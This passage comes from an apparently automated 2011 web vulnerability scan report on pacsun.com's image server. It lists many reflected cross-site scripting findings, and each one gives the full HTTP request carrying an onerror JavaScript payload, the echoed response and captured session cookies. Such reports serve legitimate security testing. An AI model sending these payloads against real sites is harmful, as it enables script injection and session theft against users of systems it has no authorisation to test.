Unable to find /pacsun/detailLogo_O0116c8f<img src=a onerror=alert(1)>ebbc796eaf3

3.98. http://images3.pacsun.com/is/image/pacsun/detailLogo_S01 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/detailLogo_S01

Issue detail

The value of REST URL parameter 4 is copied into the response body without HTML encoding. The payload 56b0a<img%20src%3da%20onerror%3dalert(1)>9b1e6a14d99 was submitted in the REST URL parameter 4 and was echoed, URL-decoded, as 56b0a<img src=a onerror=alert(1)>9b1e6a14d99 in the application's response.

The proof of concept places an <img> element with an onerror event handler, and so arbitrary JavaScript, into the response body. The response is served with Content-Type: text/plain rather than text/html and without an X-Content-Type-Options header, so the handler is reflected verbatim but only executes in a client that renders this body as HTML; confirm in a browser before rating the finding as exploitable.

Request

GET /is/image/pacsun/detailLogo_S0156b0a<img%20src%3da%20onerror%3dalert(1)>9b1e6a14d99?$img_gif$&hei=20&wid=100&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; mbox=check#true#1317384269|session#1317384208243-106173#1317386069|PC#1317384208243-106173.19#1318593819; fsr.a=1317384219407

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 81
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:43 GMT
Connection: close

Unable to find /pacsun/detailLogo_S0156b0a<img src=a onerror=alert(1)>9b1e6a14d99

3.99. http://images3.pacsun.com/is/image/pacsun/detailLogo_VolcomBar [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/detailLogo_VolcomBar

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 60e50<img%20src%3da%20onerror%3dalert(1)>105ed31e3a1 was submitted in the REST URL parameter 4. This input was echoed as 60e50<img src=a onerror=alert(1)>105ed31e3a1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/detailLogo_VolcomBar60e50<img%20src%3da%20onerror%3dalert(1)>105ed31e3a1?$img_gif$&hei=20&wid=70&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; mbox=check#true#1317384269|session#1317384208243-106173#1317386069|PC#1317384208243-106173.19#1318593819; fsr.a=1317384219407

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 87
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:26 GMT
Connection: close

Unable to find /pacsun/detailLogo_VolcomBar60e50<img src=a onerror=alert(1)>105ed31e3a1

3.100. http://images3.pacsun.com/is/image/pacsun/headerEmailV3_envelope [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/headerEmailV3_envelope

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 82005<img%20src%3da%20onerror%3dalert(1)>f7417a937a was submitted in the REST URL parameter 4. This input was echoed as 82005<img src=a onerror=alert(1)>f7417a937a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/headerEmailV3_envelope82005<img%20src%3da%20onerror%3dalert(1)>f7417a937a?$img_gif$&$ext=.gif HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; mbox=check#true#1317384269|session#1317384208243-106173#1317386069; fsr.a=1317384208366

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 88
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:04 GMT
Connection: close

Unable to find /pacsun/headerEmailV3_envelope82005<img src=a onerror=alert(1)>f7417a937a

3.101. http://images3.pacsun.com/is/image/pacsun/homeBTF1_090611 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/homeBTF1_090611

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload bf11a<img%20src%3da%20onerror%3dalert(1)>b2a55de1d7f was submitted in the REST URL parameter 4. This input was echoed as bf11a<img src=a onerror=alert(1)>b2a55de1d7f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/homeBTF1_090611bf11a<img%20src%3da%20onerror%3dalert(1)>b2a55de1d7f?&$img_jpg_full$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; mbox=check#true#1317384269|session#1317384208243-106173#1317386069; fsr.a=1317384208366

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 82
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:10 GMT
Connection: close

Unable to find /pacsun/homeBTF1_090611bf11a<img src=a onerror=alert(1)>b2a55de1d7f

3.102. http://images3.pacsun.com/is/image/pacsun/homeBTF2_092011 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/homeBTF2_092011

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 6f66e<img%20src%3da%20onerror%3dalert(1)>4eb36ef817c was submitted in the REST URL parameter 4. This input was echoed as 6f66e<img src=a onerror=alert(1)>4eb36ef817c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/homeBTF2_0920116f66e<img%20src%3da%20onerror%3dalert(1)>4eb36ef817c?&$img_jpg_full$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; mbox=check#true#1317384269|session#1317384208243-106173#1317386069; fsr.a=1317384208366

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 82
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:07 GMT
Connection: close

Unable to find /pacsun/homeBTF2_0920116f66e<img src=a onerror=alert(1)>4eb36ef817c

3.103. http://images3.pacsun.com/is/image/pacsun/homeMainA_093011 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/homeMainA_093011

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 35fb9<img%20src%3da%20onerror%3dalert(1)>77ca712fdaa was submitted in the REST URL parameter 4. This input was echoed as 35fb9<img src=a onerror=alert(1)>77ca712fdaa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/homeMainA_09301135fb9<img%20src%3da%20onerror%3dalert(1)>77ca712fdaa?$img_jpg_full$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; mbox=check#true#1317384269|session#1317384208243-106173#1317386069; fsr.a=1317384208366

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 83
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:10 GMT
Connection: close

Unable to find /pacsun/homeMainA_09301135fb9<img src=a onerror=alert(1)>77ca712fdaa

3.104. http://images3.pacsun.com/is/image/pacsun/logo_v3 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/logo_v3

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8a524<img%20src%3da%20onerror%3dalert(1)>285e07c9753 was submitted in the REST URL parameter 4. This input was echoed as 8a524<img src=a onerror=alert(1)>285e07c9753 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/logo_v38a524<img%20src%3da%20onerror%3dalert(1)>285e07c9753?$img_png-alpha$&$ext=.png HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; mbox=check#true#1317384269|session#1317384208243-106173#1317386069; fsr.a=1317384208366

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 74
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:04:56 GMT
Connection: close

Unable to find /pacsun/logo_v38a524<img src=a onerror=alert(1)>285e07c9753

3.105. http://images3.pacsun.com/is/image/pacsun/mainNav2_arrivals3Off [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/mainNav2_arrivals3Off

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ec7f7<img%20src%3da%20onerror%3dalert(1)>042a2b90b3c was submitted in the REST URL parameter 4. This input was echoed as ec7f7<img src=a onerror=alert(1)>042a2b90b3c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/mainNav2_arrivals3Offec7f7<img%20src%3da%20onerror%3dalert(1)>042a2b90b3c?$img_gif$&$ext=.gif HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; mbox=check#true#1317384269|session#1317384208243-106173#1317386069; fsr.a=1317384208366

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 88
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:04:59 GMT
Connection: close

Unable to find /pacsun/mainNav2_arrivals3Offec7f7<img src=a onerror=alert(1)>042a2b90b3c

3.106. http://images3.pacsun.com/is/image/pacsun/mainNav2_blog5Off [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/mainNav2_blog5Off

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b33c3<img%20src%3da%20onerror%3dalert(1)>81badf9861 was submitted in the REST URL parameter 4. This input was echoed as b33c3<img src=a onerror=alert(1)>81badf9861 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/mainNav2_blog5Offb33c3<img%20src%3da%20onerror%3dalert(1)>81badf9861?$img_gif$&$ext=.gif HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; mbox=check#true#1317384269|session#1317384208243-106173#1317386069; fsr.a=1317384208366

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 83
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:05 GMT
Connection: close

Unable to find /pacsun/mainNav2_blog5Offb33c3<img src=a onerror=alert(1)>81badf9861

3.107. http://images3.pacsun.com/is/image/pacsun/mainNav2_brands3Off [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/mainNav2_brands3Off

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8889d<img%20src%3da%20onerror%3dalert(1)>01d9ca41aeb was submitted in the REST URL parameter 4. This input was echoed as 8889d<img src=a onerror=alert(1)>01d9ca41aeb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/mainNav2_brands3Off8889d<img%20src%3da%20onerror%3dalert(1)>01d9ca41aeb?$img_gif$&$ext=.gif HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; mbox=check#true#1317384269|session#1317384208243-106173#1317386069; fsr.a=1317384208366

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 86
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:00 GMT
Connection: close

Unable to find /pacsun/mainNav2_brands3Off8889d<img src=a onerror=alert(1)>01d9ca41aeb

3.108. http://images3.pacsun.com/is/image/pacsun/mainNav2_denim3Off [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/mainNav2_denim3Off

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d4936<img%20src%3da%20onerror%3dalert(1)>a8983b2e578 was submitted in the REST URL parameter 4. This input was echoed as d4936<img src=a onerror=alert(1)>a8983b2e578 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/mainNav2_denim3Offd4936<img%20src%3da%20onerror%3dalert(1)>a8983b2e578?$img_gif$&$ext=.gif HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; mbox=check#true#1317384269|session#1317384208243-106173#1317386069; fsr.a=1317384208366

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:04:57 GMT
Connection: close

Unable to find /pacsun/mainNav2_denim3Offd4936<img src=a onerror=alert(1)>a8983b2e578

3.109. http://images3.pacsun.com/is/image/pacsun/mainNav2_mens3Off [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/mainNav2_mens3Off

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 53e9d<img%20src%3da%20onerror%3dalert(1)>9227fd9ac38 was submitted in the REST URL parameter 4. This input was echoed as 53e9d<img src=a onerror=alert(1)>9227fd9ac38 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/mainNav2_mens3Off53e9d<img%20src%3da%20onerror%3dalert(1)>9227fd9ac38?$img_gif$&$ext=.gif HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; mbox=check#true#1317384269|session#1317384208243-106173#1317386069; fsr.a=1317384208366

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 84
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:04:56 GMT
Connection: close

Unable to find /pacsun/mainNav2_mens3Off53e9d<img src=a onerror=alert(1)>9227fd9ac38

3.110. http://images3.pacsun.com/is/image/pacsun/mainNav2_music3Off [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/mainNav2_music3Off

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d7564<img%20src%3da%20onerror%3dalert(1)>ae4a8344046 was submitted in the REST URL parameter 4. This input was echoed as d7564<img src=a onerror=alert(1)>ae4a8344046 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/mainNav2_music3Offd7564<img%20src%3da%20onerror%3dalert(1)>ae4a8344046?$img_gif$&$ext=.gif HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; mbox=check#true#1317384269|session#1317384208243-106173#1317386069; fsr.a=1317384208366

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:05 GMT
Connection: close

Unable to find /pacsun/mainNav2_music3Offd7564<img src=a onerror=alert(1)>ae4a8344046

3.111. http://images3.pacsun.com/is/image/pacsun/mainNav2_sale3Off [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/mainNav2_sale3Off

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 80c46<img%20src%3da%20onerror%3dalert(1)>de7e3ff4af6 was submitted in the REST URL parameter 4. This input was echoed as 80c46<img src=a onerror=alert(1)>de7e3ff4af6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/mainNav2_sale3Off80c46<img%20src%3da%20onerror%3dalert(1)>de7e3ff4af6?$img_gif$&$ext=.gif HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; mbox=check#true#1317384269|session#1317384208243-106173#1317386069; fsr.a=1317384208366

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 84
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:04:59 GMT
Connection: close

Unable to find /pacsun/mainNav2_sale3Off80c46<img src=a onerror=alert(1)>de7e3ff4af6

3.112. http://images3.pacsun.com/is/image/pacsun/mainNav2_shoes3Off [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/mainNav2_shoes3Off

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d7ba4<img%20src%3da%20onerror%3dalert(1)>e2aa5885018 was submitted in the REST URL parameter 4. This input was echoed as d7ba4<img src=a onerror=alert(1)>e2aa5885018 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/mainNav2_shoes3Offd7ba4<img%20src%3da%20onerror%3dalert(1)>e2aa5885018?$img_gif$&$ext=.gif HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; mbox=check#true#1317384269|session#1317384208243-106173#1317386069; fsr.a=1317384208366

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:04:58 GMT
Connection: close

Unable to find /pacsun/mainNav2_shoes3Offd7ba4<img src=a onerror=alert(1)>e2aa5885018

3.113. http://images3.pacsun.com/is/image/pacsun/mainNav2_womens3Off [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/mainNav2_womens3Off

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3add1<img%20src%3da%20onerror%3dalert(1)>28f4f2fac2 was submitted in the REST URL parameter 4. This input was echoed as 3add1<img src=a onerror=alert(1)>28f4f2fac2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/mainNav2_womens3Off3add1<img%20src%3da%20onerror%3dalert(1)>28f4f2fac2?$img_gif$&$ext=.gif HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; mbox=check#true#1317384269|session#1317384208243-106173#1317386069; fsr.a=1317384208366

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:04:57 GMT
Connection: close

Unable to find /pacsun/mainNav2_womens3Off3add1<img src=a onerror=alert(1)>28f4f2fac2

3.114. http://images3.pacsun.com/is/image/pacsun/mensMega_092811b [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/mensMega_092811b

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload afdad<img%20src%3da%20onerror%3dalert(1)>75e3f56b32f was submitted in the REST URL parameter 4. This input was echoed as afdad<img src=a onerror=alert(1)>75e3f56b32f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/mensMega_092811bafdad<img%20src%3da%20onerror%3dalert(1)>75e3f56b32f?$img_jpg_full$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; mbox=check#true#1317384269|session#1317384208243-106173#1317386069; fsr.a=1317384208366

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 83
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:04:57 GMT
Connection: close

Unable to find /pacsun/mensMega_092811bafdad<img src=a onerror=alert(1)>75e3f56b32f

3.115. http://images3.pacsun.com/is/image/pacsun/newMega_092811b [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/newMega_092811b

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8f7f7<img%20src%3da%20onerror%3dalert(1)>ad010335fe7 was submitted in the REST URL parameter 4. This input was echoed as 8f7f7<img src=a onerror=alert(1)>ad010335fe7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/newMega_092811b8f7f7<img%20src%3da%20onerror%3dalert(1)>ad010335fe7?&$img_jpg_full$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
